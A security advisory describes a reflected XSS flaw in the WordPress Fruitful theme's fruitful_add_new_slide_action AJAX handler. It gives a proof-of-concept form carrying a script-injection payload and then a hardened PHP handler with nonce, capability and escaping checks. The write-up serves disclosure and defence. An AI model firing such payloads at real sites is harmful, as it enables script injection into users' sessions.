Fruitful [Reflected XSS]

Description

The Fruitful theme is vulnerable to reflected XSS through the AJAX action fruitful_add_new_slide_action. This action outputs the contents of the variable $_POST['data'] without proper escaping, which allows an attacker to craft a malicious request that executes JS code in the victim's browser.

Because this action is a privileged one, it only works for a registered and logged-in user.

PoC

Submit this form as a logged-in user:

<form action="http://example.com/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="fruitful_add_new_slide_action">
    <input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
    <input type="submit" value="Click Me!">
</form>
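
The fix pattern for this class of bug, as an added example that is not the theme's own code: the handler function names, the nonce action name `example_add_slide`, the capability, and the output markup are all assumptions made for illustration. The payload in the PoC breaks out of a quoted attribute, so the sketch assumes the value is echoed into an attribute and escapes it for that context.

```php
<?php
// Added example. Hypothetical handlers for illustration only; this is not
// Fruitful's source. Only the AJAX action name comes from the advisory.

// Vulnerable pattern: request data is echoed into an attribute unescaped,
// so a value beginning with "> closes the attribute and injects markup.
function example_add_slide_vulnerable() {
    $data = $_POST['data'];
    echo '<input type="text" name="slide" value="' . $data . '">';
    wp_die();
}

// Hardened pattern: verify intent, verify privilege, then escape on output.
function example_add_slide_hardened() {
    // A cross-site form post carries the victim's cookies but not a valid
    // nonce, so this stops the request before any output is produced.
    // 'example_add_slide' and the 'nonce' field name are assumptions.
    check_ajax_referer( 'example_add_slide', 'nonce' );

    // Being logged in is not enough; require a capability that matches the
    // feature (the capability chosen here is an assumption).
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Accept only a string, undo WordPress's added slashes, strip tags.
    $data = '';
    if ( isset( $_POST['data'] ) && is_string( $_POST['data'] ) ) {
        $data = sanitize_text_field( wp_unslash( $_POST['data'] ) );
    }

    // Escape for the attribute context at the point of output. This is the
    // control that neutralises the "> breakout even if sanitising is changed.
    echo '<input type="text" name="slide" value="' . esc_attr( $data ) . '">';
    wp_die();
}

// Register only the hardened handler for logged-in users (wp_ajax_ prefix).
add_action( 'wp_ajax_fruitful_add_new_slide_action', 'example_add_slide_hardened' );
```

With the hardened handler, the PoC value is rendered as inert text inside the attribute (`&quot;&gt;...`), and a form submitted from another origin is rejected at the nonce check.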

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX